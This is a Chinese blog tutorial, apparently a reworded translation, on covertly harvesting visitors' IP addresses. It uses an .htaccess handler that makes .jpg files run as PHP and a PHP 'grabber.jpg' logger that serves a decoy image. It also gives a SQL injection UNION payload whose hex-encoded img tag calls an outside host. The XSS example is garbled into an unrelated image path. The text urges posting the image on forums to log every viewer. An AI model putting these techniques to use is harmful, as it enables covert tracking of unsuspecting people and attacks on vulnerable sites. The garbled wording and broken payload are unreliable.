本日早上起床以後,我看到一篇關於應用sql註入語句獵取ip地點的文章,對此我很感興致,就細心瀏覽瞭一下,在讀完這篇文章以後,我有瞭一個新的設法主意:
經由過程對htaccess的應用,完成用一張照片獵取別人的ip地點。
在本教程中,我們將進修若何用一張照片來竊取ip地點。我的設法主意是經由過程修正.htaccess文件,將jpg文件看成php文件來剖析。
上面就是我們須要向.htaccess中增加的代碼:
AddHandler application/x-httpd-php5 .jpg
然後將上面的代碼復制到記事本中,定名為grabber.jpg
<?php
$fh = fopen(‘ip_list.txt’, ‘a’);
fwrite($fh, $_SERVER[‘REMOTE_ADDR’]."
“);
fclose($fh);
$im = imagecreatefromjpeg(“n00b.png");
header(‘Content-Type: image/jpeg’);
imagejpeg($im);
imagedestroy($im);
?>
將grabber.jpg的權限設置為755,然後再找一張照片,將其定名為n00b.png,接著放到與grabber.jpg雷同的目次當中。
就如許,統統事情停當瞭。當他人閱讀grabber.jpg這張照片的時刻,他的ip地點就會被記載下來。
(譯者註:須要把這些器械上傳至我們的小我網站空間中)
POC:
(譯者註:作者這裡貼瞭一張可獵取ip的演示照片,為瞭人人的隱私,我未將其貼出,讀者可自行去作者博客檢察)
至此,我們的照片已能夠開端事情瞭。
接著我還想解釋一下若何應用SQLi來獵取ip地點。實在應用照片來竊取ip地點非常快速,我們沒有來由去應用SQLi這類辦法,然則為瞭讓讀者獵取到更多的常識,我照樣解釋一下吧:
/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
如今,再說一下若何應用xss來獵取ip地點:
/2016/0411/1460368129852.jpg" alt="經由過程照片獵取IP地點 SQL註入語句 SQL註入 SQL註入進擊">&submit=Search
好瞭,就是這些瞭。
我們能夠用這個技能做很多風趣的工作,究竟上大部門社區都許可我們宣佈一些照片,以是我們能夠用這個辦法去獵取全部拜訪到我們照片的人的ip地點。
感謝您的瀏覽,Happy Hacking!
註:相幹網站扶植技能瀏覽請移步到建站教程頻道。
>> 檢察更多類似文章